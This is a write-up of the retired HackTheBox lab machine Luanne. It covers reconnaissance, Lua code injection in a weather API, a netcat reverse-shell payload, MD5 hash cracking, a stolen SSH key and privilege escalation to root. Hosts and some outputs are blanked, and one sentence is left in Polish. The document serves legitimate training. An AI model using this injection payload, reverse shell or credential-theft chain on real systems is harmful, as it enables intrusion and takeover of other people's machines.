Writeup: HackTheBox Luanne Machine

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Luanne, is retired.

Machine Info


Luanne graph

2. Preparation

I have prepared some useful variables:

export IP=

3. Scanning and Reconnaissance

First, I ran an aggressive scan with nmap to reveal and identify services that were running on the 1000 most popular ports.

└──╼ $nmap -sC -sV -Pn -n -oN nmap/01-initial.txt -T4 $IP
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 23:44 CET
Nmap scan report for
Host is up (0.040s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.99 seconds

Access to both services was protected according to The 'Basic' HTTP Authentication Scheme RFC7617. The /weather resource was nevertheless available on port 80. I therefore launched the gobuster tool:

└──╼ $gobuster dir -u  http://$IP/weather -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster/01-initial.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/12/21 00:11:13 Starting gobuster
/forecast (Status: 200)
2020/12/21 00:27:04 Finished

I therefore sent a query to \weather\forecast:

└──╼ $curl
{"code": 200, "message": "No city specified. Use 'city=list' to list available cities."}

and then, according to the response I received, I sent a request for a list of localities:

└──╼ $curl
{"code": 200,"cities": ["London","Manchester","Birmingham","Leeds","Glasgow","Southampton","Liverpool","Newcastle","Nottingham","Sheffield","Bristol","Belfast","Leicester"]}

Finally, I sent a request for weather information about London:

└──╼ $curl
{"code": 200,"city": "London","list": [{"date": "2020-12-20","weather": {"description": "snowy","temperature": {"min": "12","max": "46"},"pressure": "1799","humidity": "92","wind": {"speed": "2.1975513692014","degree": "102.76822959445"}}},{"date": "2020-12-21","weather": {"description": "partially cloudy","temperature": {"min": "15","max": "43"},"pressure": "1365","humidity": "51","wind": {"speed": "4.9522297247313","degree": "262.63571172766"}}},{"date": "2020-12-22","weather": {"description": "sunny","temperature": {"min": "19","max": "30"},"pressure": "1243","humidity": "13","wind": {"speed": "1.8041767538525","degree": "48.400944394059"}}},{"date": "2020-12-23","weather": {"description": "sunny","temperature": {"min": "30","max": "34"},"pressure": "1513","humidity": "84","wind": {"speed": "2.6126398323104","degree": "191.63755226741"}}},{"date": "2020-12-24","weather": {"description": "partially cloudy","temperature": {"min": "30","max": "36"},"pressure": "1772","humidity": "53","wind": {"speed": "2.7699138359167","degree": "104.89152945159"}}}]}

4. Gaining Access

I didn’t know if I could control another parameter besides the city parameter. So I decided to wfuzz this parameter in hopes of any diagnostic information in case of an error:

One of the first attempts using wfuzz….

└──╼ $wfuzz -z range,0-255

…zwróciła wiele rezultatów, które minimalnie różniły się liczbą słów.

I decided to analyze this case further. The largest number of responses came with a length of 12 and 5 words:

└──╼ $curl
{"code": 200, "message": "No city specified. Use 'city=list' to list available cities."}
└──╼ $curl
{"code": 500,"error": "unknown city: London"}

I therefore filtered them out of the results:

└──╼ $wfuzz -z range,0-255 --hw 5,12
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
* Wfuzz 3.1.0 - The Web Fuzzer                         *

Total requests: 256

ID           Response   Lines    Word       Chars       Payload

000000028:   500        1 L      9 W        77 Ch       "27"
000000021:   500        0 L      6 W        46 Ch       "20"
000000201:   500        0 L      6 W        47 Ch       "200"
000000203:   500        0 L      6 W        47 Ch       "202"
000000202:   500        0 L      6 W        47 Ch       "201"
000000204:   500        0 L      6 W        47 Ch       "203"
000000206:   500        0 L      6 W        47 Ch       "205"
000000210:   500        0 L      6 W        47 Ch       "209"
000000208:   500        0 L      6 W        47 Ch       "207"
000000209:   500        0 L      6 W        47 Ch       "208"
000000205:   500        0 L      6 W        47 Ch       "204"
000000207:   500        0 L      6 W        47 Ch       "206"

Total time: 0
Processed Requests: 256
Filtered Requests: 244
Requests/sec.: 0

The result with 6 words is:

└──╼ $curl
{"code": 500,"error": "unknown city: London "}

In contrast, the sought-after answer was provided by the demand:

└──╼ $curl
<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

Next, using the URLEncode functionality in CyberChef I encoded a fragment of the city parameter value:


And I sent the request:

└──╼ $curl
{"code": 500,"error": "unknown city: Londonuid=24(_httpd) gid=24(_httpd) groups=24(_httpd)

So I received proof of the possibility of remote code execution.

I immediately sent a request to execute the uname -a command to identify the operating system:

└──╼ $curl
{"code": 500,"error": "unknown city: LondonNetBSD luanne.htb 9.0 NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020  mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/amd64/compile/GENERIC amd64

From the responses, it was known that:

I therefore added an entry to /etc/hosts:    luanne.htb

In order to establish a session with the system shell, I ran nc:

└──╼ $nc -nvlp 4444
listening on [any] 4444 ...

And I coded the value of the city parameter:

London')os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f")--

And I sent the request:

└──╼ $curl

As a result of the described actions, I established a session as user _httpd.

└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 65164
sh: can't access tty; job control turned off
$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)

5. Privilege Escalation: _httpd ⇨ r.michaels

In order to make the linpeas tool available, I started an http server:

└──╼ $python3 -m http.server
Serving HTTP on port 8000 ( ...

I then downloaded and launched the mentioned tool:

$ cd /tmp
$ curl>linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  220k  100  220k    0     0   550k      0 --:--:-- --:--:-- --:--:--  550k
$ /bin/sh linpeas.sh

In the standard output, I observed an interesting entry containing an MD5 digest:

Reading /var/www/.htpasswd

I proceeded to try to recover the password:

└──╼ $echo '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0'>md5_hash
└──╼ $hashcat -a 0 -m 500 md5_hash /usr/share/wordlists/rockyou.txt --optimized-kernel-enable

After a dozen or so, the password was cracked:


So I had a set of credentials webapi_user:iamthebest.

I tried to authenticate to the http services on port 80 and 9001. On port 80 I was able to access the content of the page:

Luanne authenticated 80

I’ll admit that at this point I was stuck for a while. I didn’t know if there was any other service? Did linpeas on NetBSD miss something important? What had I missed?

Looking through the NetBSD User’s Guide I found, among other things, that the basic system configuration is stored in the /etc/rc.conf file:

$ cat /etc/rc.conf

#	$NetBSD: rc.conf,v 1.97 2014/07/14 12:29:48 mbalmer Exp $
# ...
if [ -r /etc/defaults/rc.conf ]; then
	. /etc/defaults/rc.conf

# If this is not set to YES, the system will drop into single-user mode.

# Add local overrides below.

#dhcpcd_flags="-qM wm0"




httpd_flags="-u -X -s -i -I 3000 -L weather /usr/local/webapi/weather.lua"

httpd_devel_flags="-u -X -s -i -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua"
#httpd_devel_flags="-u -X -s -I 3000 -L weather /home/r.michaels/devel/webapi/weather.lua"


So there was a production and a developer instance of an http server providing weather information. The first one ran locally on port 3001, and the second - the development one - on port 3001. It was also clear from the configuration that the development server was running with the user rights of r.michaels.

So I tried using the same error again:

$ curl -u webapi_user:iamthebest   
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    65    0    65    0     0  32500      0 --:--:-- --:--:-- --:--:-- 32500
{"code": 500,"error": "unknown city: London')os.execute("id")--"}

Unfortunately, in this case there was no error present in the production version.

So I decided to check the availability of the http server user directory:

$ curl -u webapi_user:iamthebest
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   601    0   601    0     0   293k      0 --:--:-- --:--:-- --:--:--  293k
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
	border-top: 1px solid black;
	border-bottom: 1px solid black;
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<tr><th>Name<th>Last modified<th align=right>Size
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB

An id_rsa file was available….

$ curl -u webapi_user:iamthebest
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0  1274k      0 --:--:-- --:--:-- --:--:-- 1274k

… Which contained the SSH private key. I saved the contents to a file and connected after ssh:

└──╼ $chmod 400 r.michaels_id_rsa 
└──╼ $ssh r.michaels@luanne.htb -i ./r.michaels_id_rsa 
Last login: Mon Dec 21 23:59:47 2020 from
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ id
uid=1000(r.michaels) gid=100(users) groups=100(users)

It remained to read the user flag:

luanne$ ls -lah
total 7.6K
dr-xr-x---  7 r.michaels  users  512B Sep 16 18:20 .
drwxr-xr-x  3 root        wheel  512B Sep 14 06:46 ..
-rw-r--r--  1 r.michaels  users  1.7K Feb 14  2020 .cshrc
drwx------  2 r.michaels  users  512B Sep 14 17:16 .gnupg
-rw-r--r--  1 r.michaels  users  431B Feb 14  2020 .login
-rw-r--r--  1 r.michaels  users  265B Feb 14  2020 .logout
-rw-r--r--  1 r.michaels  users  1.5K Feb 14  2020 .profile
-rw-r--r--  1 r.michaels  users  166B Feb 14  2020 .shrc
dr-x------  2 r.michaels  users  512B Sep 16 16:51 .ssh
dr-xr-xr-x  2 r.michaels  users  512B Nov 24 09:26 backups
dr-xr-x---  4 r.michaels  users  512B Sep 16 15:02 devel
dr-x------  2 r.michaels  users  512B Sep 16 16:52 public_html
-r--------  1 r.michaels  users   33B Sep 16 17:16 user.txt
luanne$ cat user.txt

6. Privilege Escalation: r.michaels ⇨ root

In the directory ~/backups there was an encrypted file devel_backup-2020-09-16.tar.gz.enc.

luanne$ pwd
luanne$ ls

In order to decrypt the file, I wanted to run the gpg2 program, but it was not available:

luanne$ gpg2
ksh: gpg2: not found

So I searched the file system for a similar program:

luanne$ ls -Ralh / 2>/dev/null | grep 'gpg\|pgp'

Among other things, I found information about the netpgp program in the search results:

-r-xr-xr-x   1 root  wheel    25K Feb 14  2020 netpgp

In the manual for NetBSD, you can read the page dedicated to netpgp:

    The netpgp command can digitally sign files and verify that the signa-
    tures attached to files were signed by a given user identifier.  netpgp
    can also encrypt files using the public or private keys of users and, in
    the same manner, decrypt files which were encrypted.

So I decrypted the file:

luanne$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output ./devel_backup-2020-09-16.tar.gz 
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>

I then downloaded it from the station and unpacked it:

└──╼ $scp -i ./r.michaels_id_rsa r.michaels@luanne.htb:/tmp/devel_backup-2020-09-16.tar.gz ./
devel_backup-2020-09-16.tar.gz                                                                                              100% 1639    39.4KB/s   00:00    
└──╼ $unar devel_backup-2020-09-16.tar.gz 
devel_backup-2020-09-16.tar.gz: Tar in Gzip
  devel-2020-09-16/  (dir)... OK.
  devel-2020-09-16/www/  (dir)... OK.
  devel-2020-09-16/webapi/  (dir)... OK.
  devel-2020-09-16/webapi/weather.lua  (7072 B)... OK.
  devel-2020-09-16/www/index.html  (378 B)... OK.
  devel-2020-09-16/www/.htpasswd  (47 B)... OK.
Successfully extracted to "devel-2020-09-16".

In the unpacked archive, I found the password md5 hash again:

└──╼ $cat .htpasswd 

So I restarted the hashcat:

└──╼ $echo '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' >> md5_hash
└──╼ $hashcat -a 0 -m 500 md5_hash /usr/share/wordlists/rockyou.txt --optimized-kernel-enable

After a few seconds, the standard output showed the result:


I tried logging in as root:

luanne$ doas -u root /bin/ksh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)

It remained to read the flag:

# cat /root/root.txt

7. Summary

The following circumstances led to the acquisition of the flags: